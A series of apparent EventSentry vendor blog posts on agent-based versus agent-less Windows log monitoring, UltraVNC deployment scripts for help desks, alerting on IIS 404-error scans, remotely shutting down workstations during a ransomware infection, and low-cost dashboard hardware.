The irony, when promoting a solution as agent-less, is that even so-called agent-less solutions do in fact utilize and agent – the only difference being that the agent is (usually) integrated into Windows. Windows doesn’t just magically service remote clients asking for a boatload of WMI data – it processes these requests through the WMI service, which, for all intents and purposes, is an agent. For example, accessing the Windows event logs via WMI traverses significantly more layers than accessing the event logs directly.

Conclusion

With the exception of network devices where an agent cannot be installed, agent-based solutions will provide a more thorough monitoring experience 9 out of 10 times – assuming that the agent meets all the checklist requirements below.

Some event log monitoring vendors will try to convince you that agent-less monitoring is better & easier (easier for whom?) – but don’t fall for it. We’ve been tweaking and improving the EventSentry agent for more than 10 years, and as a result EventSentry offers one of the most advanced and efficient Windows agents for log monitoring on the market. Developing a rock-solid, secure and fast agent is hard, but it’s the only sensible approach which doesn’t cut corners.

There are situations when deploying a full-scale monitoring solution with agents is not possible, for example when you are tasked with monitoring a third-party network where installing any software is not an option. While unfortunate, an agent-less monitoring solution can fill the gap in this case.

EventSentry also utilizes SNMP (agent-less) to gather inventory, performance metrics as well as other system data from non-Windows devices, including Linux hosts. This collection method does suffer from the above limitations, but since log data is pushed from Non-Windows devices via the Syslog protocol, it’s an acceptable compromise.

Don’t compromise when it comes to monitoring the (event) logs of your Windows infrastructure and select an architecture which scales and offers security & performance.

Technical Comparison

The table below examines the difference between agent-based and agent-less solutions in greater detail.

Resource Utilization & Performance
Agent-Based
Agent-Less
Verdict
  • Usually higher throughput since agents can analyze, filter and evaluate log entries before sending them across the network.
  • Local resource utilization depends on the implementation of the agent.
  • Agent can access (event) logs directly via efficient API access.
  • Network utilization is likely much higher since more logs have to be transmitted across the network before being evaluated. Local filtering capabilities are limited and depend on the protocol (usually WMI).
  • Network latency and utilization affect performance of monitoring solution. Network utilization cannot be controlled.
  • Accessing (event) log data remotely through WMI is much less efficient.
  • Over-saturation of central monitoring component can negatively affect monitoring of entire infrastructure.
Higher network utilization combined with the fact that remote log collection will still utilize CPU cycles on the remote host (e.g. through WMI provider) favors agent-based solutions.
Agent-less solutions have a single point of failure, while agents can filter & evaluate data locally before transmitting them to a central database.
EventSentry Agents are designed to be essentially invisible under normal operations and do not impact the host system negatively in any way.
Stability & Reliability
Agent-Based
Agent-Less
Verdict
  • Failure of an agent does not affect monitoring of other hosts.
  • Locally collected data can be cached if central monitoring component is temporarily unavailable.
  • Failure of a central component may negatively affect deployed agents if they rely on the central component and cannot cache data.
  • Failure of central monitoring system will affect and potentially disable monitoring of all hosts.
  • Hosts which lose network connectivity (e.g. laptops) cannot be monitored while unreachable.
Agent-based solutions have an advantage since local data can be cached and corrective actions can be executed even when the central monitoring component is unavailable. Cache data & logs are re-transmitted – even if the local logs have been cleared or overwritten.
Agent-based solutions can monitor hosts even when disconnected from LAN.
The EventSentry Agent auto-recovers if the process aborts unexpectedly, and by default alerts the user when this occurs. When using the collector (default), the agent caches all data locally and retransmits when the network connection becomes available again.
Deployment
Agent-Based
Agent-Less
Verdict
  • Has to be deployed either with vendor management software and/or with third-party deployment software if vendor provides installation package (e.g. MSI).
  • Larger deployments will require multiple central monitoring components, potentially distributed over several LANs.
  • Only hosts in local LAN can be monitored.
Depends on deployment tools made available by vendor as well as management tools in place for configuring Windows settings. A poorly developed deployment tool would favor an agent-less solution.
EventSentry Agents can be deployed (multi-threaded) with the management console or through 3rd party deployment software by creating a MSI installer on the fly. When using the collector (default), agent updates (patches) can be deployed automatically.
Dependencies
Agent-Based
Agent-Less
Verdict
  • Agent may have dependencies on third-party frameworks
  • Depends on whether the mechanism utilized by the monitoring software requires a Windows component to be added and/or configured.
Depends on whether agent has dependencies and whether configuration changes need to be made on the monitored hosts.
The EventSentry Agent does not depend on any 3rd party frameworks or libraries.
Security
Agent-Based
Agent-Less
Verdict
  • Potential security issues if installed agent exposes itself to the network (if not firewalled) and/or suffers from local vulnerabilities which can be exploited.
  • Remote log collection has to be enabled and at least the central monitoring component needs to have remote access.
  • Secure data transmission relies on protocols and settings from Windows.
  • Enabling multiple methods for gathering data remotely (e.g. WMI) provides additional attack vectors.
  • Credentials (usually Windows user/password) for remote systems must be stored in a central location so that the remote hosts can be queried. If the central system gets compromised, critical credentials can be exploited.
Since agent-based solutions do not require permanent remote access and monitored hosts can therefore be hardened more, they are inherently more secure IF the agent doesn’t suffer from an insecure design and/or vulnerabilities.
Agent-based solutions also have more control over how data is transmitted from the remote hosts.
If there is general concern against third-party software then the product in question should be researched in a vulnerability database like http://www.cvedetails.com.
The EventSentry Agent does not open any ports on a monitored host and resides in a secured location on disk. The agent transmits compressed data securely via TLS to the collector. No major security vulnerabilities have been discovered in the EventSentry agent since its first release in 2002.
Scope & Functionality
Agent-Based
Agent-Less
Verdict
  • Agents have full access to the monitored system and can choose which technology to utilize to get the required data (API, WMI, registry, …)
  • Easily execute local corrective action like launching a script or process
  • Agent-less solutions are limited to remote APIs provided by the monitored host, most commonly WMI. While WMI does offer a lot of functionality, there are limitations.
  • Executing scripts on remote host is more involved and only possible when host is reachable.
Agent-based solutions have an advantage since they can utilize multiple technologies to obtain data, including highly efficient direct API access. Agents can also trigger (corrective) actions locally even while the agent is unreachable.
Agent-less solutions can only monitor data which is made available by the remote protocol.
The EventSentry Agent accesses log files, event logs and other system health data almost exclusively via direct API calls. The more resource-intensive WMI interface is only used minimally, for very specific purposes. Corrective action can be taken directly on the monitored host, often only in milliseconds after an error condition (event) has occurred.

 

Appendix: Checklist

When evaluating software that offers agents then you can utilize the check list below for evaluation purposes.

Resource Utilization
An agent needs to consume as little resources as possible under normal operations. With the exception of short (and unusual) peak periods, a user should never know that an agent is running on their server or workstation – period.
The thought of having a resource-hogging agent running on a server sends shivers down the backs of many SysAdmins, and the agents used by certain AntiVirus vendors that rhyme with Taffy didn’t set a good precedent.
Stability & Reliability
The agent needs to run at all times without crashing – the SysAdmin needs to be able to go to sleep knowing that his agents will reliably monitor all servers and workstations. Unstable agents are just no fun, especially when they negatively impact the host OS.
If an agent that encounters an issue, it needs to at least auto-recover and communicate the issue to the admin.
Deployment
Agent deployment and management needs to be streamlined and easy – it shouldn’t be a burden on the end user. And while agent deployment is important, agent management, keeping the remote agent up-to-date, is equally important and should – ideally – be handled automatically.
Most SysAdmins have enough work the way it is, the last thing they need is baby-sitting agents of their monitoring solution.
Dependencies
The more dependencies an agent has, the more difficult it is to deploy the agent. Agents that rely on complex frameworks like .NET, Java or specific Visual Studio runtimes are difficult and time-consuming to deploy.
Furthermore, any third-party software that is installed as a dependency creates an additional attack vector and needs to then be kept up-to-date.
Security
An agent needs to be 100% secure and cannot expose the monitored host to any additional security risks. I will explain below why using agents is actually more secure than not using an agent – even though this seems counter-intuitive at first glance.

Remote Support with VNC – The Easy & Secure Way!

Almost everyone in IT has heard of VNC – which actually stands for “Virtual Network Computing”. The RFB (Remote Framebuffer) protocol which VNC relies on, was developed around 1998 by Olivetti & Oracle Research Labs. Olivetti (unlike Oracle) isn’t much known outside of Italy/Europe, and the ORL was ultimately closed in 2002 after being acquired by AT&T. But enough of the history.

When the need arises to remotely log into a (Windows) host on the network, Microsoft’s Remote Desktop application (which utilizes Microsoft’s RDP protocol – not RFB) is usually the default choice. And why wouldn’t it be? It’s built into Windows, there is no additional cost, and it’s usually quite efficient (=fast) – even over slower connections.

Remote Desktop has a few disadvantages though, especially when it comes to the IT help desk:

  • You cannot view the remote user’s current desktop
  • It’s not cross-platform
  • You can’t use RDP if it’s disabled or misconfigured

Especially when troubleshooting user problems, being able to see exactly what the user is doing is obviously very beneficial. VNC-based applications are a good alternative since they allow you to view the user’s desktop and subsequently interact with the user. This makes VNC viable for help desk as well as troubleshooting. Nevertheless, VNC-based solutions have their own shortcomings:

  • Free variations of VNC usually offer no deployment assistance
  • With over 10 variants available, finding the best VNC implementation is a daunting task
  • VNC is still deemed as somewhat insecure
  • VNC can be slow

We set out to solve these shortcomings by creating a number of scripts around UltraVNC that integrate with the EventSentry management console (although they’ll work well without EventSentry as well!). Using the QuickTools feature, you can then connect to a remote host via VNC with 2 clicks, even if the remote host doesn’t have VNC installed.

Important: The scripts only work in environments where you have administrative access to the remote hosts. The scripts need to copy files to the remote host’s administrative shares and control the remote VNC service.

Alternatively, you will also be able to start a VNC session by running the following command:

vnc_start.bat remotehost.yourdomain.com

Even better, VNC can be automatically stopped and deactivated (until vnc_start.bat is run again) once the session is completed in order to reduce the attack surface.

VNC Deployment
As long as you have administrative access to the remote host(s), the script will remotely install VNC and even setup a firewall exclusion rule if necessary – although the UltraVNC installer takes care of this out of the box.

Security
To reduce the attack surface of machines running VNC you can automatically stop the VNC service after you have disconnected from the remote host. Our connection script will automatically start the remote service again when you connect the next time.

For the utmost security you can also completely uninstall VNC when you are done, a script (vnc_uninstall.bat) is included for this purpose.

Speed
Even though VNC is generally not as fast as RDP, it’s usually sufficiently fast in LAN environments (especially for shorter trouble-shooting sessions) and the UltraVNC port which we’ll be covering in this post performs reasonably well even over slower WAN connections.

Integration with EventSentry
Monitoring workstations with EventSentry strengthens the capabilities of any IT helpdesk and IT support team with:

  • Software & Hardware Inventory
  • Access to process utilization and log consolidation
  • Enhanced security with security log & service monitoring
  • User console logon tracking
  • Pro-active troubleshooting with access to performance and other system health metrics

Remote desktop sharing is an additional benefit with the UltraVNC package which is included with the latest version of EventSentry (v3.3.1.42). Customizing the scripts and integrating them with EventSentry literally shouldn’t take more than 5 minutes, and once setup & configured will allow you to remotely control any monitored host with a couple of clicks. The scripts do not require EventSentry, but are included with the setup and integrate seamlessly into the EventSentry Management Console.

The EventSentry Management Console includes the “QuickTools” feature which allows you to link up to 8 commands to the context menu of a computer item. EventSentry ships with a few default QuickTools commands, for example to reboot a remote machine. Once configured, you simply right-click a computer icon in the EventSentry Management console and select one of the pre-configured applications from the QuickTools sub menu.

EventSentry QuickTools
EventSentry QuickTools

How does it work?
When you run the vnc_start.bat script, it will first check to see if UltraVNC is already installed on the remote host. If it is, it will skip the installation routine and bring up the local VNC viewer. If you configured the script to automatically stop the VNC service when not in use, it will start the service beforehand. When you disconnect, it will (optionally) stop the VNC service again so that VNC is not accessible remotely anymore.

If VNC is not installed, the script will remotely install & configure UltraVNC using psexec.

If you do not want to leave the UltraVNC service installed on the remote computer, the vnc_uninstall.bat script can be run when the remote session is done. Automatically stopping the remote VNC service is however sufficient in most cases.

Prerequisites
There is not much you need:

Installation
The scripts need to be configured before they can be used in your environment, unless you are an EventSentry user, in which case you only need to download & install the prerequisites.

Super Quick Setup for EventSentry Users
It’s no secret, we’re a little biased towards our EventSentry users, and as such setting this up with an existing EventSentry installation is rather easy:

  1. Get psexec.exe and save it in C:\Program Files (x86)\EventSentry\resources.
  2. Download the UltraVNC installers (they have 32-bit and 64-bit – download for the platforms you have on your network) and store them in the C:\Program Files (x86)\EventSentry\scripts\ultravnc folder.
  3. Install UltraVNC on the computer where EventSentry is installed so that the VNC Viewer is available. It’s not necessary to install the whole package, only the viewer component is required.
  4. If “VNC” is not listed in your QuickTools menu, then you will need to add it under Tools->Options->QuickTools. Simply enter “VNC” as the description and specify the path to the vnc_start utility, e.g. “C:\Program Files (x86)\EventSentry\scripts\ultravnc\vnc_start.bat $COMPUTER”. You can optionally check the “Hide” box to prevent the script output from being shown before you connect.

You’ll notice that no password was configured – that’s because you will be logging in with a Windows user and password – only allowing domain admins access by default. This can be configured in the authorized_acl.inf file, if you want to give additional groups and/or users access that are not domain admins.

That’s literally it – easy as pie. Even though we designed this thing to be easy peasy, since things do occasionally go wrong I recommend testing a first connection from the command line. Just open an administrative command prompt, navigate to C:\Program Files (x86)\EventSentry\scripts\ultravnc and type vnc_start somehost.

Now just right-click any host – or use the “Quicktools” button in the ribbon – and select the “VNC” menu option. Keep in mind that first-time connections will take longer since the VNC setup file has to be copied and installed on the remote computer. Subsequent connections should be faster.

VNC Viewer Connect Dialog
VNC Viewer Connect Dialog

Manual Normal-Speed Setup for Non-EventSentry Users
So you are not an EventSentry user but still want to utilize these awesome scripts? No problem – we won’t hold it against you. The setup is still easy – you’ll just need to customize a few variables in the variables.bat file.

  1. Download the package from here.
  2. Create a local folder for this project, e.g. C:\Deployment\UltraVNC.
  3. Copy all the scripts to this folder, e.g. you should end up with C:\Deployment\UltraVNC\vnc_start.bat
  4. Open the file variables.bat in a text editor and keep it open as you will be making a few modifications to this file.
  5. In variables.bat, set the VNCSOURCE variable to the directory you just created.
  6. Download the latest version of both the 32-bit and 64-bit UltraVNC installers.
  7. In variables.bat, set the VNCSETUP_X86 and VNCSETUP_X64 to the setup file names you just downloaded.
  8. Download the PSTools and extract psexec.exe into the working directory, or a directory of your choice.
  9. In variables.bat, point the PSEXECFILE variable to the location where you just saved psexec.exe.
  10. Optional: Edit the authorized_acl.inf file to specify which Windows group or user will have access to VNC. You can either change the first line, or add additional lines to give additional users and/or groups permission.
  11. Install the respective version of UltraVNC on your workstation so that the VNC Viewer is available.
  12. Open a command line window and navigate to the folder to which VNCSOURCE points to. Test the setup by running vnc_start hostname, replacing “hostname” with an actual host name of a remote host of course.
  13. When presented with the login screen of the VncViewer, log in with a Windows domain admin user.

That wasn’t so bad now, was it? Just remember that you’ll need to initiate any VNC session with the vnc_start.bat file. Just launching the Viewer won’t work – even if VNC is already installed on the remote machine – since the VNC service is stopped by our scripts by default. To use the folder names we created, you’ll just run

C:\Deployment\UltraVNC\vnc_start hostname

Enjoy, and happy RFBing!

Connecting to remote host
Connecting to remote host

Configuration – variables.bat
For the sake of completeness the variables.bat file is explained below:

VNCSETUP_X86: The file name of the 32-bit installer. This needs to only be changed whenever UltraVNC comes out with a new version.
VNCSETUP_X64: The file name of the 64-bit installer. This needs to only be changed whenever UltraVNC comes out with a new version.

REMOTEINSTALLPATH: The directory where the script files will be copied to on the remote host.

VNCSOURCE: This is the folder where all the vnc-related files, including the setup executables, are located on the source host from where you initiate VNC connections – e.g. C:\Deployment\UltraVNC.
VNCINSTALLDIR: The directory in which UltraVNC will be installed in (on the remote hosts).

VNCPASSWORD: This variable is not currently used since UltraVNC is automatically configured to authenticate against Windows, by default giving only Domain Admins access to VNC. This is generally more secure than using a password. You can edit the file authorized_acl.inf to give additional users and/or groups access to VNC. The file supports one ACL entry per line.

PSEXECFILE: Unfortunately we are not allowed to bundle the nifty psexec.exe file for license reasons, so you’ll have to download the PsTools and point this variable to wherever you end up copying the psexec.exe file to. If you already have psexec.exe installed then you can save yourself 2 minutes of time and just specify the path to the existing file here.

SET_VNC_SVC_TO_MANUAL: If you don’t entirely trust the security of VNC, maybe because you know what a brute force attack is, and you only want administrators to access VNC then you can set this variable to 1. As long as you only connect to the remote host(s) using the vnc_install.bat script, the scripts will ensure that the remote VNC service is started before you connect and stopped after you disconnect. Between the two of us, I’d always leave this set to 1 unless you have the desire to launch the VNC Viewer directly, or need non-administrators to be able to connect to the remote host(s).

ADD_FIREWALL_RULE: As the name (almost) implies, this will create a firewall exclusion rule on the remote host(s) if you’ve been doing your homework and enabled the Windows firewall. If you don’t like our boring firewall rule name then you can even change the name below by editing the FW_RULE_NAME variable. Enabling this is usually not necessary since the UltraVNC setup adds firewall exclusion rules by default.

VNCVIEWER: If you find that a different version of the VNC viewer works better than the version which we are shipping, then you can change the file name here.

 

Detecting Web Server Scans in Real-Time

Any web site exposed to the Internet is constantly being probed by bots, malicious hackers and other evildoers in an attempt to take over the machine, gain access to unauthorized data, install back doors and so forth. Detecting probing attempts as early as possible and taking corrective action as soon possible is key to maintaining a secure network.

Manual probing usually involves investigating the HTTP headers to determine the type of web server (e.g. IIS, Apache, Nginx), viewing HTML sources and possibly attempt to access well-known pages in order to determine whether any well-known web-based software (WordPress, CRM, OWA, …) is installed.

IIS Email Alert
Email alert from an IIS web site scan

If the attacker prefers the sledgehammer approach then he or she may also point a vulnerability scanner such as OpenVAS at the web server, which will reveal vulnerabilities with a minimum amount of work. Automated systems aren’t as surgical and will usually just look for specific vulnerabilities by checking for the existence of various URLs on the web server.

But whether it’s a manual probe, a vulnerability scan or a bot, all methods usually result in a non-existent page (URL) being attempted to be accessed, resulting in a “Page Not Found”, 404 error at some point. As such, a larger than usual amount of 404 errors can be a good indicator that suspicious activity is occurring on your web server. If you are a little paranoid like me then you could even look for every single 404 error that occurs on your web server. The same technique can be applied to other errors as well, such as “Access Denied” errors for example if the web site is secured by ACLs.

EventSentry’s log file monitoring feature can monitor Windows-based log files in real time and trigger alerts and/or corrective actions by applying sophisticated rulesets to all parsed text.

Log File Flow
Log File Flow (Icon made by Freepik from www.flaticon.com)

I’ll explain how this can be setup based on an IIS web server, but the same generic steps would apply to other web servers as well.

  1. Define the log file
    The first step is to tell EventSentry which log file you’d like to monitor in the management console. Using the ribbon click on “Packages”, “Log Files” and “Define Files”. In the “Log Files” section on top, click on the plus icon (+) and define the log file. Give the file a descriptive name, specify the path to the log file and select “Non-Delimited” as the file type. Make sure to utilize wild cards or variables for the log file path if the name of the log file is dynamic, as shown in the screenshot below:

    IIS Log File Setup
    IIS Log File Setup

    If you plan on storing contents in the EventSentry database as well then you can also select a matching log file definition (such as IIS 7) as the log file type. More information on log file types can be found in our IIS Log File Monitoring with EventSentry screen cast.

  2. Setup a log file filter
    A log file filter defines where content from the log file is routed to. In this example we’ll route 404 errors to the Application event log. Using the ribbon again, and while still in the log file context, click on “Add Package” on the top left to create a new package – give the package a descriptive name. Then, click the “Assign” button to assign this package globally, to a group or individual host. (remember that you can also assign packages dynamically). Now click “Add” in the “Log File” section to add the previously configured log file to the package.

    Log File Filter
    Specify how log file content is routed

    In the resulting dialog we can configure the log file filter to send log file contents to the database, the event log or both. For the purpose of this example we will only log certain lines of the log file to the event log – those matching the wildcard filter * 404* (note the space between the first * and 404) as shown in the screenshot above. You can also use a regex expression for a more sophisticated match type.

  3. Setup Event Log Filter
    At this point EventSentry will log an informational event every time the text ” 404″ is logged to the specified log file. In order to dispatch (e.g. to an email recipient) this event however, an include filter needs to be setup which should look similar to the screenshot below:

    Event Log Filter for Log File Alert
    Event Log Filter

That’s all that is required to trigger an email or process every time a 404 error is triggered on your web server. Read on to refine this setup and only get alerted when the same remote IP address triggers a certain number of 404 errors within a certain time period – fun!

Additional Resources
Owasp.org is a great resource for web developers which provides a plethora of information to help keep web sites secure. The Owasp Top 10 document illustrates what the most critical web application security flaws are.

Tutorial: Delimited Log File Monitoring
Screen Cast: Log File Monitoring with EventSentry

Bonus for Advanced Users (requires EventSentry v3.3 or later)
Getting alerts whenever specific text – like a 404 error – are logged is quite useful, but utilizing EventSentry’s advanced event log filter & thresholds features can reduce noise and make monitoring log file contents even more actionable.

EventSentry supported utilizing insertion strings from events for quite some time, allowing you to use those insertion strings either in actions (e.g. an email subject, a parameter for a script) or thresholds. Since events don’t always utilize insertion strings properly, or custom content in events needs to be parsed separately, EventSentry v3.3 and later let you define insertion strings based on regular expressions. The screenshot below shows insertion strings before and after a regular expression fitted for IIS 7.5 is applied to EventSentry’s log file monitoring alert:

Apply RegEx to Event
Overriding insertion strings by applying a regular expression

You can learn more about insertion strings here, and view insertion strings either with the Event Message Browser or the EventSentry Management Console (Tools -> Utilities). The regular expression for a default IIS 7.5 setup is as follows:

([0-9]{4}-[0-9]{2}-[0-9]{2}) ([0-9]{2}:[0-9]{2}:[0-9]{2}) ([0-9\\.]*) ([A-Z]*) (.*?) (.*?) ([0-9]*) (.*?) ([0-9\\.]*) (.*?) ([0-9]*) ([0-9]*) ([0-9]*) ([0-9]*)

Since insertion strings can be used in variables (e.g. $STR1 … $STR14) and thresholds, overriding insertion strings in an event has two main benefits:

  • Use any field from the log file in the email subject and other action fields
  • Create thresholds based on log file content – e.g. create dynamic run-time thresholds for each IP address

Regular expressions are set using the “Advanced” button on the “Generic” tab of an event log filter. In the advanced dialog, simply click “Edit” in the “Insertion String Override” section.

Using insertion strings in emails
The generic EventSentry email subject is nice, but a customized subject reflecting the type of alert would certainly be better:

Red Alert: IIS scan detected from IP $STR9

This is possible with the redefined insertion strings, since #9 (=$STR9) is the remote host’s IP address. To set a custom subject, click the “Advanced” button on the “Generic” tab of an event log filter.

Using insertion strings in thresholds
By default, threshold counters are increased every time an event matches the corresponding filter. To stick with our example here, we could configure EventSentry to let us know if more than three 404 errors occur within 5 minutes. But we’d essentially be throwing all events into the same bucket. If you look at it in detail however, you realize that it makes a difference whether three 404 errors are a result of activity from the same remote host, or three different remote hosts.

Since events are often a result of specific activity by something or somebody, it’s important that we can correlate multiple events. In our example, the “something” is the remote host, which is represented by insertion string $STR9. As such, we can configure our threshold to use $STR9 as the common identifier, and create unique thresholds based on the run-time value of $STR9. By doing that, we will trip the threshold only if the same remote host accesses a non-existing URL three times, but not if three different remote hosts only access one non-existent URL each.

Event Log Filter Threshold
Event Log Filter Threshold

The same technique can be applied to thresholds for failed logon events. It’s usually acceptable if a user types the wrong password a few times, but a large number of failed logons from the same user are not. Just applying a threshold to all 4625 events is usually not practicable since many users occasionally type a wrong password. But by tying the threshold to the insertion string representing the user name (they are 6 & 7 in case you are curious), we can create a separate threshold for every user and avoid false positives.

Defeating Ransomware with EventSentry – Remediation

Since Ransomware is still all the rage – literally – I decided to write a 4th article with a potentially better method to stop an ongoing infection. In part 1, part 2 and part 3 we focused mostly on detecting an ongoing Ransomware infection and utilized the “nuclear” option to prevent it from spreading: stopping the “server” service which would prevent any client from accessing files on the affected server.

While these methods are certainly effective, there are other more targeted steps you can take instead of or in addition to shutting down the server service, provided that all hosts susceptible to a Ransomware infection are monitored by EventSentry.

When EventSentry detects an ongoing Ransomware infection, it can usually determine the infected user by extracting the domain user name from the 4663 event. Simply disabling the user is insufficient however, since a disabled user can continue to access the network (and wreak havoc) as long as he or she doesn’t log off. Any subsequent log on attempt would of course fail, but that provides little comfort when the user’s computer continues to plow through hundreds or thousands of documents, relentlessly encrypting everything in its path.

As such, the only reliable way to stop the ongoing infection, given only the user name, is to log off the user. While logging a user off remotely is possible using the query session and logoff.exe commands, I prefer to completely shut down the offending computer in order to reduce the risk of any future malicious activity. Logging the user off remotely may still be preferable in a terminal server environment (let me know if you want me to cover this in a future article).

Knowing the user name is of course great, but how do we find out which computer he or she is logged on to? If you have EventSentry deployed across your entire network – including workstations – then you can get this info by querying the console logon reports in the EventSentry web reports. If you are not so lucky to have EventSentry deployed in your entire environment (we offer significant discounts for large quantities of workstation licenses – you can request a quote here) then we can still obtain this information from the “net session” command in Windows.

Net Session Output
Net Session Output

We’ve created a little script named antiransom_shutdown.vbs which, given a user name, will report back from which remote IP this user most recently accessed the local server and optionally shut it down. Here are some usage examples:

Find out from which computer boris.johnson most recently accessed this server:
cscript.exe C:\Scripts\antiransom_shutdown.vbs boris.johnson

Find out from which computer boris.johnson most recently accessed this server AND shut the remote host down (if found):
cscript.exe C:\Scripts\antiransom_shutdown.vbs boris.johnson shutdown

The script uses only built-in Windows commands, as such there is no need to install anything else on the server where it’s run.

When executed with the “shutdown” parameter, the script will issue a shutdown command to the remote host, which will display a (customizable) warning message to the user indicating that the computer is being shutdown because of a potential infection. The timeout is 5 seconds by default but can be customized in the script. It’s recommended to keep the timeout short (5-10 seconds) in order to neutralize the threat as quickly as possible while still giving the user a few moments to know what is happening.

The overall setup of the Ransomware detection is still the same, we’re setting up a threshold filter to detect a higher than usual frequency of certain 4663 events and trigger an action in response. Only this time we don’t shut down the server service, but instead trigger this script. To properly execute the action, configure it as shown in the screenshot below. The executable is cscript.exe (the interpreter for .vbs files) and the command line parameters are the name of the script, $STR2 and “shutdown”.

Remote workstation shut down
Remote workstation shut down

So what’s the better and safer approach to freeze an ongoing Ransomware infection? Shutting down the server service is the most reliable approach – since it doesn’t require the workstation to be reachable and will almost certainly succeed. Remotely shutting down a workstation has minimal impact on operations but may not always succeed. See below for the pros and cons of each approach:

File Sharing Shutdown
Pros: 100% effective
Cons: Potentially larger disruption than necessary, false positive unnecessarily disrupts business

Remote Workstation Shutdown
Pros: Only disables infected user/workstation, even if false positive
Cons: Requires workstation to be reachable

This ends up being one of those “it depends” situations where you will have to decide what’s the best approach based on your environment. I would personally go with the remote workstation shutdown option in large networks where the vast majority of workstations are desktops reachable (and not firewalled) from the file server. In smaller, more distributed networks with a lot of laptops, I would go with the file service shutdown “nuclear” option.

A hybrid approach may also be an option for those opting for the remote workstation shutdown method: trigger a remote workstation shutdown during business hours when IT staff is available on short notice, but configure the file service shutdown after business hours when it’s safer and affects fewer people. All this can be configured in EventSentry by creating two filters which are identical except for the action and the day/time settings.

Prerequisites
It’s important to point out that the EventSentry agent by default runs under the LocalSystem account, a built-in user account which does not have sufficient privileges on a remote host to issue the shutdown command. You can elevate the permissions of the EventSentry agent and work-around this limitation in 2 ways:

  1. Change the service account (fast): Changing the service account the EventSentry service uses to a domain account with administrative permissions will allow the agent to remotely shut down a remote host. This will have to be done on every file server which may issue shut down commands (you can use AutoAdministrator to update multiple file servers if necessary).
  2. Give the “Force shutdown from a remote system” user right: It’s not necessary to issue domain-wide admin rights to the EventSentry agent, the key right the agent needs is just the “Force shutdown from a remote system” user right. The quickest way to deploy this setting is of course through group policy:

    a) Open the “Group Policy Management Editor”
    b) Edit an existing policy (e.g. “Default Domain Policy”) or create a new group policy
    c) Navigate to “Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\User Rights Assignment”
    d) Double-click the “Force shutdown from a remote system” user right and add both “Administrators” and the computer accounts of the file servers to the list. Alternatively you can also create a group, add the file servers to the group, and add that group to the policy (keep in mind that you will need to restart the file servers if you go with the group method).

    Once the group policy setting has propagated to the workstations, the remote shut down initiated from the file server(s) should succeed.

    Change the "Force shutdown from a remote system" user right
    Change the “Force shutdown from a remote system” user right

 

Good luck protecting your network against Ransomware infections, also remember to verify your backups – no protection is 100% effective.

Perfect hardware for a TV-based dashboard

Dashboards are a great way to visualize large amounts of information in a concise matter. In IT we usually display various types of network data from a monitoring software, but dashboards are used in all sorts of environments. You can visualize stock data or just show a map of all trucks in a fleet with their current position.

If you work for a large company with a dedicated NOC then you’ll likely have an integrated setup with 4 or more TVs, connected to hardware specialized for dashboards or, at the very least, a powerful PC with multiple PCI cards.

But not everybody has the budget or the need for a NOC like AT&Ts, and one or two TVs can be sufficient for most networks – provided the dashboard is well-designed and customizable of course.

AT&T's NOC
AT&T NOC

Most dashboards require a fairly recent web browser (if you are unlucky even Adobe Flash), making some sort of a PC or Mac the preferred hardware to power that dashboard. Most IT departments have a plethora of old PCs sitting around, and it can be tempting to resurrect one of those boxes and give them a new life as a dashboard PC. After all, you’re “just” displaying a web page.

In reality, older hardware can a have hard time keeping up with modern browsers and the frenzy of Javascript operations that come with a busy dashboard. The dashboards often run well for some time (hours or days – depending on the hardware and the dashboard), but ultimately buckle under the load. The result is a dashboard that skips updates or breaks down altogether. Even if you do have a decent PC sitting around, it’s hardly a perfect solution since even small PCs take up a considerable amount of space, and cables can quickly get in the way. And I think we can all agree that the last thing we need more of are cables.

Low-cost integrated devices like the Raspberry Pi are tempting, but not perfect either. They’re not usually designed to be used with graphical interfaces, much less with memory and CPU hungry applications like web browsers displaying dashboards.

After trying everything from Raspberry Pi, old Mac Mini hardware and more, we finally found a solution for under $100 – which has now worked quite well for several months: The 1st generation Intel Compute Stick which you can get from online retailers like Amazon, NewEgg and others.

Intel Compute Stick
Intel Compute Stick

Even in its 1st generation (the one we tested) the Intel Compute Stick running Windows 10 Home performed surprisingly well. We’ve been running an EventSentry dashboard (which of course we’re hoping you are running as well) on it since February on Microsoft’s new Edge browser, and we’ve never had an issue.

The Intel Compute Stick features 2 Gb of RAM, is powered by a quad-core intel Atom processor and has 30 Gb of storage, of which more than half are available. This is of course not a machine you’ll want to render videos or play video games on, but plenty sufficient for a web browser from our experience. We were actually pleasantly surprised by how responsive the little device felt overall. Even though you cannot join a domain, you can still install the EventSentry agent on the machine to keep an eye on performance and other system metrics for example.

But there are of course some caveats, as is to be expected from a computer that costs less than $100 and is not much bigger than a USB memory stick. If you’re using Bluetooth and Wifi then you’ll only need to connect the power cord and the setup is clean. Since the stick also sports a single USB 2.0 port, we used a USB hub along with a USB-based Ethernet adapter to connect it to our LAN as well as connect a keyboard/mouse. USB 2.0 didn’t negatively affect performance in our limited use case scenario.

If you need more hardware, maybe because your dashboards are particularly taxing, then you can purchase a newer and faster model as well. The 2nd generation Intel Computer Sticks start around $149 and the high-end models include as much as 64Gb of disk space and 4Gb of RAM.

My first computer was a 80286 with 1Mb of RAM and a 20Mb hard drive, and it was about as big as two shoe boxes. It’s impressive to see a device this small perform that well. If you have the need to turn a TV into a full-blown desktop, then I’d definitely recommend the Intel Computer Stick(s)!